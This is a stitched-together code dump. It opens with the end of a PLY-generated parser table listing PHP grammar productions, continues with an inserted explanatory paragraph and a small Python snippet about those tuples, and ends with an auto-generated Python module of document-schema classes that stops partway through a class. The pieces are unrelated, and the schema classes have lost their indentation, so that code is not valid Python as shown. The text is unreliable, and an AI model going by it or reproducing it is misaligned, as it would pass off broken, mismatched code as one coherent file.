('expr -> CLONE expr','expr',2,'p_expr_clone','phpparse.py',843),
('expr -> LIST LPAREN assignment_list RPAREN EQUALS expr','expr',6,'p_expr_list_assign','phpparse.py',847),
('assignment_list -> assignment_list COMMA assignment_list_element','assignment_list',3,'p_assignment_list','phpparse.py',851),
('assignment_list -> assignment_list_element','assignment_list',1,'p_assignment_list','phpparse.py',852),
('assignment_list_element -> variable','assignment_list_element',1,'p_assignment_list_element','phpparse.py',859),
('assignment_list_element -> empty','assignment_list_element',1,'p_assignment_list_element','phpparse.py',860),
('assignment_list_element -> LIST LPAREN assignment_list RPAREN','assignment_list_element',4,'p_assignment_list_element','phpparse.py',861),
('variable -> base_variable_with_function_calls OBJECT_OPERATOR object_property method_or_not variable_properties','variable',5,'p_variable','phpparse.py',868),
('variable -> base_variable_with_function_calls','variable',1,'p_variable','phpparse.py',869),
('base_variable_with_function_calls -> base_variable','base_variable_with_function_calls',1,'p_base_variable_with_function_calls','phpparse.py',890),
('base_variable_with_function_calls -> function_call','base_variable_with_function_calls',1,'p_base_variable_with_function_calls','phpparse.py',891),
('function_call -> namespace_name LPAREN function_call_parameter_list RPAREN','function_call',4,'p_function_call','phpparse.py',895),
('function_call -> NS_SEPARATOR namespace_name LPAREN function_call_parameter_list RPAREN','function_call',5,'p_function_call','phpparse.py',896),
('function_call -> NAMESPACE NS_SEPARATOR namespace_name LPAREN function_call_parameter_list RPAREN','function_call',6,'p_function_call','phpparse.py',897),
('function_call -> class_name DOUBLE_COLON STRING LPAREN function_call_parameter_list RPAREN','function_call',6,'p_function_call_static','phpparse.py',906),
('function_call -> class_name DOUBLE_COLON variable_without_objects LPAREN function_call_parameter_list RPAREN','function_call',6,'p_function_call_static','phpparse.py',907),
('function_call -> variable_class_name DOUBLE_COLON STRING LPAREN function_call_parameter_list RPAREN','function_call',6,'p_function_call_static','phpparse.py',908),
('function_call -> variable_class_name DOUBLE_COLON variable_without_objects LPAREN function_call_parameter_list RPAREN','function_call',6,'p_function_call_static','phpparse.py',909),
('function_call -> class_name DOUBLE_COLON LBRACE expr RBRACE LPAREN function_call_parameter_list RPAREN','function_call',8,'p_function_call_static_dynamic_name','phpparse.py',913),
('function_call -> variable_class_name DOUBLE_COLON LBRACE expr RBRACE LPAREN function_call_parameter_list RPAREN','function_call',8,'p_function_call_static_dynamic_name','phpparse.py',914),
('function_call -> variable_without_objects LPAREN function_call_parameter_list RPAREN','function_call',4,'p_function_call_variable','phpparse.py',918),
('function_call -> BACKTICK encaps_list BACKTICK','function_call',3,'p_function_call_backtick_shell_exec','phpparse.py',922),
('method_or_not -> LPAREN function_call_parameter_list RPAREN','method_or_not',3,'p_method_or_not','phpparse.py',926),
('method_or_not -> empty','method_or_not',1,'p_method_or_not','phpparse.py',927),
('variable_properties -> variable_properties variable_property','variable_properties',2,'p_variable_properties','phpparse.py',932),
('variable_properties -> empty','variable_properties',1,'p_variable_properties','phpparse.py',933),
('variable_property -> OBJECT_OPERATOR object_property method_or_not','variable_property',3,'p_variable_property','phpparse.py',940),
('base_variable -> simple_indirect_reference','base_variable',1,'p_base_variable','phpparse.py',944),
('base_variable -> static_member','base_variable',1,'p_base_variable','phpparse.py',945),
('simple_indirect_reference -> DOLLAR simple_indirect_reference','simple_indirect_reference',2,'p_simple_indirect_reference','phpparse.py',949),
('simple_indirect_reference -> reference_variable','simple_indirect_reference',1,'p_simple_indirect_reference','phpparse.py',950),
('static_member -> class_name DOUBLE_COLON variable_without_objects','static_member',3,'p_static_member','phpparse.py',957),
('static_member -> variable_class_name DOUBLE_COLON variable_without_objects','static_member',3,'p_static_member','phpparse.py',958),
('static_member -> class_name DOUBLE_COLON LBRACE expr RBRACE','static_member',5,'p_static_member','phpparse.py',959),
('static_member -> variable_class_name DOUBLE_COLON LBRACE expr RBRACE','static_member',5,'p_static_member','phpparse.py',960),
('variable_class_name -> reference_variable','variable_class_name',1,'p_variable_class_name','phpparse.py',967),
('variable -> variable LBRACKET dim_offset RBRACKET','variable',4,'p_variable_array_offset','phpparse.py',971),
('reference_variable -> reference_variable LBRACKET dim_offset RBRACKET','reference_variable',4,'p_reference_variable_array_offset','phpparse.py',975),
('reference_variable -> reference_variable LBRACE expr RBRACE','reference_variable',4,'p_reference_variable_string_offset','phpparse.py',979),
('reference_variable -> compound_variable','reference_variable',1,'p_reference_variable_compound_variable','phpparse.py',983),
('expr -> expr LBRACE dim_offset RBRACE','expr',4,'p_expr_string_offset','phpparse.py',987),
('compound_variable -> VARIABLE','compound_variable',1,'p_compound_variable','phpparse.py',991),
('compound_variable -> DOLLAR LBRACE expr RBRACE','compound_variable',4,'p_compound_variable','phpparse.py',992),
('dim_offset -> expr','dim_offset',1,'p_dim_offset','phpparse.py',999),
('dim_offset -> empty','dim_offset',1,'p_dim_offset','phpparse.py',1000),
('object_property -> variable_name object_dim_list','object_property',2,'p_object_property','phpparse.py',1004),
('object_property -> variable_without_objects','object_property',1,'p_object_property','phpparse.py',1005),
('object_dim_list -> empty','object_dim_list',1,'p_object_dim_list_empty','phpparse.py',1012),
('object_dim_list -> object_dim_list LBRACKET dim_offset RBRACKET','object_dim_list',4,'p_object_dim_list_array_offset','phpparse.py',1016),
('object_dim_list -> object_dim_list LBRACE expr RBRACE','object_dim_list',4,'p_object_dim_list_string_offset','phpparse.py',1020),
('variable_name -> STRING','variable_name',1,'p_variable_name','phpparse.py',1024),
('variable_name -> LBRACE expr RBRACE','variable_name',3,'p_variable_name','phpparse.py',1025),
('variable_without_objects -> simple_indirect_reference','variable_without_objects',1,'p_variable_without_objects','phpparse.py',1032),
('expr -> scalar','expr',1,'p_expr_scalar','phpparse.py',1036),
('expr -> ARRAY LPAREN array_pair_list RPAREN','expr',4,'p_expr_array','phpparse.py',1040),
('expr -> LBRACKET array_pair_list RBRACKET','expr',3,'p_expr_array','phpparse.py',1041),
('array_pair_list -> empty','array_pair_list',1,'p_array_pair_list','phpparse.py',1050),
('array_pair_list -> non_empty_array_pair_list possible_comma','array_pair_list',2,'p_array_pair_list','phpparse.py',1051),
('non_empty_array_pair_list -> non_empty_array_pair_list COMMA AND variable','non_empty_array_pair_list',4,'p_non_empty_array_pair_list_item','phpparse.py',1058),
('non_empty_array_pair_list -> non_empty_array_pair_list COMMA expr','non_empty_array_pair_list',3,'p_non_empty_array_pair_list_item','phpparse.py',1059),
('non_empty_array_pair_list -> AND variable','non_empty_array_pair_list',2,'p_non_empty_array_pair_list_item','phpparse.py',1060),
('non_empty_array_pair_list -> expr','non_empty_array_pair_list',1,'p_non_empty_array_pair_list_item','phpparse.py',1061),
('non_empty_array_pair_list -> non_empty_array_pair_list COMMA expr DOUBLE_ARROW AND variable','non_empty_array_pair_list',6,'p_non_empty_array_pair_list_pair','phpparse.py',1072),
('non_empty_array_pair_list -> non_empty_array_pair_list COMMA expr DOUBLE_ARROW expr','non_empty_array_pair_list',5,'p_non_empty_array_pair_list_pair','phpparse.py',1073),
('non_empty_array_pair_list -> expr DOUBLE_ARROW AND variable','non_empty_array_pair_list',4,'p_non_empty_array_pair_list_pair','phpparse.py',1074),
('non_empty_array_pair_list -> expr DOUBLE_ARROW expr','non_empty_array_pair_list',3,'p_non_empty_array_pair_list_pair','phpparse.py',1075),
('possible_comma -> empty','possible_comma',1,'p_possible_comma','phpparse.py',1086),
('possible_comma -> COMMA','possible_comma',1,'p_possible_comma','phpparse.py',1087),
('function_call_parameter_list -> function_call_parameter_list COMMA function_call_parameter','function_call_parameter_list',3,'p_function_call_parameter_list','phpparse.py',1091),
('function_call_parameter_list -> function_call_parameter','function_call_parameter_list',1,'p_function_call_parameter_list','phpparse.py',1092),
('function_call_parameter_list -> empty','function_call_parameter_list',1,'p_function_call_parameter_list_empty','phpparse.py',1099),
('function_call_parameter -> expr','function_call_parameter',1,'p_function_call_parameter','phpparse.py',1103),
('function_call_parameter -> AND variable','function_call_parameter',2,'p_function_call_parameter','phpparse.py',1104),
('expr -> FUNCTION is_reference LPAREN parameter_list RPAREN lexical_vars LBRACE inner_statement_list RBRACE','expr',9,'p_expr_function','phpparse.py',1111),
('lexical_vars -> USE LPAREN lexical_var_list RPAREN','lexical_vars',4,'p_lexical_vars','phpparse.py',1115),
('lexical_vars -> empty','lexical_vars',1,'p_lexical_vars','phpparse.py',1116),
('lexical_var_list -> lexical_var_list COMMA AND VARIABLE','lexical_var_list',4,'p_lexical_var_list','phpparse.py',1123),
('lexical_var_list -> lexical_var_list COMMA VARIABLE','lexical_var_list',3,'p_lexical_var_list','phpparse.py',1124),
('lexical_var_list -> AND VARIABLE','lexical_var_list',2,'p_lexical_var_list','phpparse.py',1125),
('lexical_var_list -> VARIABLE','lexical_var_list',1,'p_lexical_var_list','phpparse.py',1126),
('expr -> variable PLUS_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1137),
('expr -> variable MINUS_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1138),
('expr -> variable MUL_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1139),
('expr -> variable DIV_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1140),
('expr -> variable CONCAT_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1141),
('expr -> variable MOD_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1142),
('expr -> variable AND_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1143),
('expr -> variable OR_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1144),
('expr -> variable XOR_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1145),
('expr -> variable SL_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1146),
('expr -> variable SR_EQUAL expr','expr',3,'p_expr_assign_op','phpparse.py',1147),
('expr -> expr BOOLEAN_AND expr','expr',3,'p_expr_binary_op','phpparse.py',1151),
('expr -> expr BOOLEAN_OR expr','expr',3,'p_expr_binary_op','phpparse.py',1152),
('expr -> expr LOGICAL_AND expr','expr',3,'p_expr_binary_op','phpparse.py',1153),
('expr -> expr LOGICAL_OR expr','expr',3,'p_expr_binary_op','phpparse.py',1154),
('expr -> expr LOGICAL_XOR expr','expr',3,'p_expr_binary_op','phpparse.py',1155),
('expr -> expr AND expr','expr',3,'p_expr_binary_op','phpparse.py',1156),
('expr -> expr OR expr','expr',3,'p_expr_binary_op','phpparse.py',1157),
('expr -> expr XOR expr','expr',3,'p_expr_binary_op','phpparse.py',1158),
('expr -> expr CONCAT expr','expr',3,'p_expr_binary_op','phpparse.py',1159),
('expr -> expr PLUS expr','expr',3,'p_expr_binary_op','phpparse.py',1160),
('expr -> expr MINUS expr','expr',3,'p_expr_binary_op','phpparse.py',1161),
('expr -> expr MUL expr','expr',3,'p_expr_binary_op','phpparse.py',1162),
('expr -> expr DIV expr','expr',3,'p_expr_binary_op','phpparse.py',1163),
('expr -> expr SL expr','expr',3,'p_expr_binary_op','phpparse.py',1164),
('expr -> expr SR expr','expr',3,'p_expr_binary_op','phpparse.py',1165),
('expr -> expr MOD expr','expr',3,'p_expr_binary_op','phpparse.py',1166),
('expr -> expr IS_IDENTICAL expr','expr',3,'p_expr_binary_op','phpparse.py',1167),
('expr -> expr IS_NOT_IDENTICAL expr','expr',3,'p_expr_binary_op','phpparse.py',1168),
('expr -> expr IS_EQUAL expr','expr',3,'p_expr_binary_op','phpparse.py',1169),
('expr -> expr IS_NOT_EQUAL expr','expr',3,'p_expr_binary_op','phpparse.py',1170),
('expr -> expr IS_SMALLER expr','expr',3,'p_expr_binary_op','phpparse.py',1171),
('expr -> expr IS_SMALLER_OR_EQUAL expr','expr',3,'p_expr_binary_op','phpparse.py',1172),
('expr -> expr IS_GREATER expr','expr',3,'p_expr_binary_op','phpparse.py',1173),
('expr -> expr IS_GREATER_OR_EQUAL expr','expr',3,'p_expr_binary_op','phpparse.py',1174),
('expr -> expr INSTANCEOF expr','expr',3,'p_expr_binary_op','phpparse.py',1175),
('expr -> expr INSTANCEOF STATIC','expr',3,'p_expr_binary_op','phpparse.py',1176),
('expr -> PLUS expr','expr',2,'p_expr_unary_op','phpparse.py',1180),
('expr -> MINUS expr','expr',2,'p_expr_unary_op','phpparse.py',1181),
('expr -> NOT expr','expr',2,'p_expr_unary_op','phpparse.py',1182),
('expr -> BOOLEAN_NOT expr','expr',2,'p_expr_unary_op','phpparse.py',1183),
('expr -> expr QUESTION expr COLON expr','expr',5,'p_expr_ternary_op','phpparse.py',1187),
('expr -> expr QUESTION COLON expr','expr',4,'p_expr_short_ternary_op','phpparse.py',1191),
('expr -> INC variable','expr',2,'p_expr_pre_incdec','phpparse.py',1195),
('expr -> DEC variable','expr',2,'p_expr_pre_incdec','phpparse.py',1196),
('expr -> variable INC','expr',2,'p_expr_post_incdec','phpparse.py',1200),
('expr -> variable DEC','expr',2,'p_expr_post_incdec','phpparse.py',1201),
('expr -> INT_CAST expr','expr',2,'p_expr_cast_int','phpparse.py',1205),
('expr -> DOUBLE_CAST expr','expr',2,'p_expr_cast_double','phpparse.py',1209),
('expr -> STRING_CAST expr','expr',2,'p_expr_cast_string','phpparse.py',1213),
('expr -> ARRAY_CAST expr','expr',2,'p_expr_cast_array','phpparse.py',1217),
('expr -> OBJECT_CAST expr','expr',2,'p_expr_cast_object','phpparse.py',1221),
('expr -> BOOL_CAST expr','expr',2,'p_expr_cast_bool','phpparse.py',1225),
('expr -> UNSET_CAST expr','expr',2,'p_expr_cast_unset','phpparse.py',1229),
('expr -> BINARY_CAST expr','expr',2,'p_expr_cast_binary','phpparse.py',1233),
('expr -> ISSET LPAREN isset_variables RPAREN','expr',4,'p_expr_isset','phpparse.py',1237),
('isset_variables -> isset_variables COMMA variable','isset_variables',3,'p_isset_variables','phpparse.py',1241),
('isset_variables -> variable','isset_variables',1,'p_isset_variables','phpparse.py',1242),
('expr -> EMPTY LPAREN expr RPAREN','expr',4,'p_expr_empty','phpparse.py',1249),
('expr -> EVAL LPAREN expr RPAREN','expr',4,'p_expr_eval','phpparse.py',1253),
('expr -> INCLUDE expr','expr',2,'p_expr_include','phpparse.py',1257),
('expr -> INCLUDE_ONCE expr','expr',2,'p_expr_include_once','phpparse.py',1261),
('expr -> REQUIRE expr','expr',2,'p_expr_require','phpparse.py',1265),
('expr -> REQUIRE_ONCE expr','expr',2,'p_expr_require_once','phpparse.py',1269),
('exit_or_die -> EXIT','exit_or_die',1,'p_exit_or_die','phpparse.py',1273),
('exit_or_die -> DIE','exit_or_die',1,'p_exit_or_die','phpparse.py',1274),
('expr -> exit_or_die','expr',1,'p_expr_exit','phpparse.py',1279),
('expr -> exit_or_die LPAREN RPAREN','expr',3,'p_expr_exit','phpparse.py',1280),
('expr -> exit_or_die LPAREN expr RPAREN','expr',4,'p_expr_exit','phpparse.py',1281),
('expr -> PRINT expr','expr',2,'p_expr_print','phpparse.py',1290),
('expr -> AT expr','expr',2,'p_expr_silence','phpparse.py',1294),
('expr -> LPAREN expr RPAREN','expr',3,'p_expr_group','phpparse.py',1298),
('scalar -> class_constant','scalar',1,'p_scalar','phpparse.py',1302),
('scalar -> common_scalar','scalar',1,'p_scalar','phpparse.py',1303),
('scalar -> QUOTE encaps_list QUOTE','scalar',3,'p_scalar','phpparse.py',1304),
('scalar -> STRING QUOTE encaps_list QUOTE','scalar',4,'p_scalar','phpparse.py',1305),
('scalar -> scalar_heredoc','scalar',1,'p_scalar','phpparse.py',1306),
('scalar -> nowdoc','scalar',1,'p_scalar','phpparse.py',1307),
('scalar -> class_name_constant','scalar',1,'p_scalar','phpparse.py',1308),
('scalar_heredoc -> START_HEREDOC encaps_list END_HEREDOC','scalar_heredoc',3,'p_scalar_heredoc','phpparse.py',1318),
('nowdoc -> START_NOWDOC nowdoc_text_content END_NOWDOC','nowdoc',3,'p_nowdoc','phpparse.py',1332),
('nowdoc_text_content -> nowdoc_text_content ENCAPSED_AND_WHITESPACE','nowdoc_text_content',2,'p_nowdoc_text_content','phpparse.py',1338),
('nowdoc_text_content -> empty','nowdoc_text_content',1,'p_nowdoc_text_content','phpparse.py',1339),
('scalar -> STRING_VARNAME','scalar',1,'p_scalar_string_varname','phpparse.py',1346),
('scalar -> namespace_name','scalar',1,'p_scalar_namespace_name','phpparse.py',1350),
('scalar -> NS_SEPARATOR namespace_name','scalar',2,'p_scalar_namespace_name','phpparse.py',1351),
('scalar -> NAMESPACE NS_SEPARATOR namespace_name','scalar',3,'p_scalar_namespace_name','phpparse.py',1352),
('class_constant -> class_name DOUBLE_COLON STRING','class_constant',3,'p_class_constant','phpparse.py',1361),
('class_constant -> variable_class_name DOUBLE_COLON STRING','class_constant',3,'p_class_constant','phpparse.py',1362),
('common_scalar -> LNUMBER','common_scalar',1,'p_common_scalar_lnumber','phpparse.py',1366),
('common_scalar -> DNUMBER','common_scalar',1,'p_common_scalar_dnumber','phpparse.py',1377),
('common_scalar -> CONSTANT_ENCAPSED_STRING','common_scalar',1,'p_common_scalar_string','phpparse.py',1381),
('common_scalar -> STRING CONSTANT_ENCAPSED_STRING','common_scalar',2,'p_common_scalar_string','phpparse.py',1382),
('common_scalar -> LINE','common_scalar',1,'p_common_scalar_magic_line','phpparse.py',1390),
('common_scalar -> FILE','common_scalar',1,'p_common_scalar_magic_file','phpparse.py',1394),
('common_scalar -> DIR','common_scalar',1,'p_common_scalar_magic_dir','phpparse.py',1399),
('common_scalar -> CLASS_C','common_scalar',1,'p_common_scalar_magic_class','phpparse.py',1406),
('common_scalar -> METHOD_C','common_scalar',1,'p_common_scalar_magic_method','phpparse.py',1410),
('common_scalar -> FUNC_C','common_scalar',1,'p_common_scalar_magic_func','phpparse.py',1414),
('common_scalar -> NS_C','common_scalar',1,'p_common_scalar_magic_ns','phpparse.py',1418),
('static_scalar -> common_scalar','static_scalar',1,'p_static_scalar','phpparse.py',1422),
('static_scalar -> class_constant','static_scalar',1,'p_static_scalar','phpparse.py',1423),
('static_scalar -> QUOTE QUOTE','static_scalar',2,'p_static_scalar','phpparse.py',1424),
('static_scalar -> QUOTE ENCAPSED_AND_WHITESPACE QUOTE','static_scalar',3,'p_static_scalar','phpparse.py',1425),
('static_scalar -> static_heredoc','static_scalar',1,'p_static_scalar','phpparse.py',1426),
('static_scalar -> nowdoc','static_scalar',1,'p_static_scalar','phpparse.py',1427),
('static_scalar -> class_name_constant','static_scalar',1,'p_static_scalar','phpparse.py',1428),
('class_name_constant -> class_name DOUBLE_COLON CLASS','class_name_constant',3,'p_class_name_constant','phpparse.py',1437),
('static_heredoc -> START_HEREDOC multiple_encapsed END_HEREDOC','static_heredoc',3,'p_static_heredoc','phpparse.py',1443),
('multiple_encapsed -> multiple_encapsed ENCAPSED_AND_WHITESPACE','multiple_encapsed',2,'p_multiple_encapsed','phpparse.py',1449),
('multiple_encapsed -> empty','multiple_encapsed',1,'p_multiple_encapsed','phpparse.py',1450),
('static_scalar -> namespace_name','static_scalar',1,'p_static_scalar_namespace_name','phpparse.py',1457),
('static_scalar -> NS_SEPARATOR namespace_name','static_scalar',2,'p_static_scalar_namespace_name','phpparse.py',1458),
('static_scalar -> NAMESPACE NS_SEPARATOR namespace_name','static_scalar',3,'p_static_scalar_namespace_name','phpparse.py',1459),
('static_scalar -> PLUS static_scalar','static_scalar',2,'p_static_scalar_unary_op','phpparse.py',1468),
('static_scalar -> MINUS static_scalar','static_scalar',2,'p_static_scalar_unary_op','phpparse.py',1469),
('static_scalar -> ARRAY LPAREN static_array_pair_list RPAREN','static_scalar',4,'p_static_scalar_array','phpparse.py',1473),
('static_scalar -> LBRACKET static_array_pair_list RBRACKET','static_scalar',3,'p_static_scalar_array','phpparse.py',1474),
('static_array_pair_list -> empty','static_array_pair_list',1,'p_static_array_pair_list','phpparse.py',1482),
('static_array_pair_list -> static_non_empty_array_pair_list possible_comma','static_array_pair_list',2,'p_static_array_pair_list','phpparse.py',1483),
('static_non_empty_array_pair_list -> static_non_empty_array_pair_list COMMA static_expr','static_non_empty_array_pair_list',3,'p_static_non_empty_array_pair_list_item','phpparse.py',1490),
('static_non_empty_array_pair_list -> static_expr','static_non_empty_array_pair_list',1,'p_static_non_empty_array_pair_list_item','phpparse.py',1491),
('static_non_empty_array_pair_list -> static_non_empty_array_pair_list COMMA static_scalar DOUBLE_ARROW static_expr','static_non_empty_array_pair_list',5,'p_static_non_empty_array_pair_list_pair','phpparse.py',1498),
('static_non_empty_array_pair_list -> static_scalar DOUBLE_ARROW static_expr','static_non_empty_array_pair_list',3,'p_static_non_empty_array_pair_list_pair','phpparse.py',1499),
('static_expr -> static_scalar','static_expr',1,'p_static_expr','phpparse.py',1506),
('static_expr -> static_expr BOOLEAN_AND static_expr','static_expr',3,'p_static_expr','phpparse.py',1507),
('static_expr -> static_expr BOOLEAN_OR static_expr','static_expr',3,'p_static_expr','phpparse.py',1508),
('static_expr -> static_expr LOGICAL_AND static_expr','static_expr',3,'p_static_expr','phpparse.py',1509),
('static_expr -> static_expr LOGICAL_OR static_expr','static_expr',3,'p_static_expr','phpparse.py',1510),
('static_expr -> static_expr LOGICAL_XOR static_expr','static_expr',3,'p_static_expr','phpparse.py',1511),
('static_expr -> static_expr AND static_expr','static_expr',3,'p_static_expr','phpparse.py',1512),
('static_expr -> static_expr OR static_expr','static_expr',3,'p_static_expr','phpparse.py',1513),
('static_expr -> static_expr XOR static_expr','static_expr',3,'p_static_expr','phpparse.py',1514),
('static_expr -> static_expr CONCAT static_expr','static_expr',3,'p_static_expr','phpparse.py',1515),
('static_expr -> static_expr PLUS static_expr','static_expr',3,'p_static_expr','phpparse.py',1516),
('static_expr -> static_expr MINUS static_expr','static_expr',3,'p_static_expr','phpparse.py',1517),
('static_expr -> static_expr MUL static_expr','static_expr',3,'p_static_expr','phpparse.py',1518),
('static_expr -> static_expr DIV static_expr','static_expr',3,'p_static_expr','phpparse.py',1519),
('static_expr -> static_expr SL static_expr','static_expr',3,'p_static_expr','phpparse.py',1520),
('static_expr -> static_expr SR static_expr','static_expr',3,'p_static_expr','phpparse.py',1521),
('static_expr -> static_expr MOD static_expr','static_expr',3,'p_static_expr','phpparse.py',1522),
('static_expr -> static_expr IS_IDENTICAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1523),
('static_expr -> static_expr IS_NOT_IDENTICAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1524),
('static_expr -> static_expr IS_EQUAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1525),
('static_expr -> static_expr IS_NOT_EQUAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1526),
('static_expr -> static_expr IS_SMALLER static_expr','static_expr',3,'p_static_expr','phpparse.py',1527),
('static_expr -> static_expr IS_SMALLER_OR_EQUAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1528),
('static_expr -> static_expr IS_GREATER static_expr','static_expr',3,'p_static_expr','phpparse.py',1529),
('static_expr -> static_expr IS_GREATER_OR_EQUAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1530),
('static_expr -> LPAREN static_expr RPAREN','static_expr',3,'p_static_expr_group','phpparse.py',1538),
('namespace_name -> namespace_name NS_SEPARATOR STRING','namespace_name',3,'p_namespace_name','phpparse.py',1542),
('namespace_name -> STRING','namespace_name',1,'p_namespace_name','phpparse.py',1543),
('namespace_name -> ARRAY','namespace_name',1,'p_namespace_name','phpparse.py',1544),
('encaps_list -> encaps_list encaps_var','encaps_list',2,'p_encaps_list','phpparse.py',1551),
('encaps_list -> empty','encaps_list',1,'p_encaps_list','phpparse.py',1552),
('encaps_list -> encaps_list ENCAPSED_AND_WHITESPACE','encaps_list',2,'p_encaps_list_string','phpparse.py',1562),
('encaps_var -> VARIABLE','encaps_var',1,'p_encaps_var','phpparse.py',1571),
('encaps_var -> VARIABLE LBRACKET encaps_var_offset RBRACKET','encaps_var',4,'p_encaps_var_array_offset','phpparse.py',1575),
('encaps_var -> VARIABLE OBJECT_OPERATOR STRING','encaps_var',3,'p_encaps_var_object_property','phpparse.py',1580),
('encaps_var -> DOLLAR_OPEN_CURLY_BRACES expr RBRACE','encaps_var',3,'p_encaps_var_dollar_curly_expr','phpparse.py',1585),
('encaps_var -> DOLLAR_OPEN_CURLY_BRACES STRING_VARNAME LBRACKET expr RBRACKET RBRACE','encaps_var',6,'p_encaps_var_dollar_curly_array_offset','phpparse.py',1589),
('encaps_var -> CURLY_OPEN variable RBRACE','encaps_var',3,'p_encaps_var_curly_variable','phpparse.py',1594),
('encaps_var_offset -> STRING','encaps_var_offset',1,'p_encaps_var_offset_string','phpparse.py',1598),
('encaps_var_offset -> NUM_STRING','encaps_var_offset',1,'p_encaps_var_offset_num_string','phpparse.py',1602),
('encaps_var_offset -> VARIABLE','encaps_var_offset',1,'p_encaps_var_offset_variable','phpparse.py',1606),
('empty -> <empty>','empty',0,'p_empty','phpparse.py',1610),
]
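The tuples above follow the format PLY writes into its generated parser tables: (rule string, left-hand-side nonterminal, right-hand-side length, handler function name, source file, line number). As a minimal, illustrative sketch (the sample tuples below are copied from the table above; the `group_by_lhs` helper is not part of PLY), the rules can be grouped by their nonterminal:

```python
from collections import defaultdict

# A few representative production tuples in the same format as the table above:
# (rule, lhs, rhs_length, handler, filename, line)
_sample_productions = [
    ('expr -> expr PLUS expr', 'expr', 3, 'p_expr_binary_op', 'phpparse.py', 1160),
    ('expr -> MINUS expr', 'expr', 2, 'p_expr_unary_op', 'phpparse.py', 1181),
    ('empty -> <empty>', 'empty', 0, 'p_empty', 'phpparse.py', 1610),
]

def group_by_lhs(productions):
    """Group production tuples by their left-hand-side nonterminal."""
    grouped = defaultdict(list)
    for rule, lhs, rhs_length, handler, filename, line in productions:
        grouped[lhs].append((rule, rhs_length, handler))
    return dict(grouped)

grouped = group_by_lhs(_sample_productions)
```

Note how several alternatives for one nonterminal (here `expr`) share a single handler function; PLY dispatches all of them to the named `p_*` method.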
# This file was automatically generated by `python.ts`.
# Do not modify it by hand. Instead, modify the source `.schema.yaml` files
# in the `schema` directory and run `npm run build:py` to regenerate it.
from typing import Any, Dict, List as Array, Optional, Union
from enum import Enum
ECitationMode = Enum("CitationMode", ["normal", "suppressAuthor"])
EItemListOrder = Enum("ItemListOrder", ["ascending", "descending", "unordered"])
ECellType = Enum("CellType", ["data", "header"])
ERowType = Enum("RowType", ["header", "footer"])
class Entity:
"""The most basic item, defining the minimum properties required."""
id: Optional[str] = None
meta: Optional[Dict[str, Any]] = None
def __init__(
self,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
)
if id is not None:
self.id = id
if meta is not None:
self.meta = meta
class ArraySchema(Entity):
"""A schema specifying constraints on an array node."""
contains: Optional["SchemaTypes"] = None
items: Optional["SchemaTypes"] = None
maxItems: Optional[float] = None
minItems: Optional[float] = None
uniqueItems: Optional[bool] = None
def __init__(
self,
contains: Optional["SchemaTypes"] = None,
id: Optional[str] = None,
items: Optional["SchemaTypes"] = None,
maxItems: Optional[float] = None,
meta: Optional[Dict[str, Any]] = None,
minItems: Optional[float] = None,
uniqueItems: Optional[bool] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if contains is not None:
self.contains = contains
if items is not None:
self.items = items
if maxItems is not None:
self.maxItems = maxItems
if minItems is not None:
self.minItems = minItems
if uniqueItems is not None:
self.uniqueItems = uniqueItems
class BooleanSchema(Entity):
"""A schema specifying that a node must be a boolean value."""
def __init__(
self,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
class Cite(Entity):
"""A reference to a CreativeWork that is cited in another CreativeWork."""
target: str
citationMode: Optional["ECitationMode"] = None
content: Optional[Array["InlineContent"]] = None
pageEnd: Optional[Union[str, int]] = None
pageStart: Optional[Union[str, int]] = None
pagination: Optional[str] = None
prefix: Optional[str] = None
suffix: Optional[str] = None
def __init__(
self,
target: str,
citationMode: Optional["ECitationMode"] = None,
content: Optional[Array["InlineContent"]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
pageEnd: Optional[Union[str, int]] = None,
pageStart: Optional[Union[str, int]] = None,
pagination: Optional[str] = None,
prefix: Optional[str] = None,
suffix: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if target is not None:
self.target = target
if citationMode is not None:
self.citationMode = citationMode
if content is not None:
self.content = content
if pageEnd is not None:
self.pageEnd = pageEnd
if pageStart is not None:
self.pageStart = pageStart
if pagination is not None:
self.pagination = pagination
if prefix is not None:
self.prefix = prefix
if suffix is not None:
self.suffix = suffix
class CiteGroup(Entity):
"""A group of `Cite` nodes"""
items: Array["Cite"]
def __init__(
self,
items: Array["Cite"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if items is not None:
self.items = items
class Code(Entity):
"""Inline code."""
text: str
programmingLanguage: Optional[str] = None
def __init__(
self,
text: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
programmingLanguage: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if text is not None:
self.text = text
if programmingLanguage is not None:
self.programmingLanguage = programmingLanguage
class CodeBlock(Code):
"""A code block."""
def __init__(
self,
text: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
programmingLanguage: Optional[str] = None
) -> None:
super().__init__(
text=text,
id=id,
meta=meta,
programmingLanguage=programmingLanguage
)
class CodeChunk(CodeBlock):
"""A executable chunk of code."""
alters: Optional[Array[str]] = None
assigns: Optional[Array[Union[str, "Variable"]]] = None
declares: Optional[Array[Union[str, "Variable", "Function"]]] = None
duration: Optional[float] = None
errors: Optional[Array["CodeError"]] = None
imports: Optional[Array[Union[str, "SoftwareSourceCode", "SoftwareApplication"]]] = None
outputs: Optional[Array["Node"]] = None
reads: Optional[Array[str]] = None
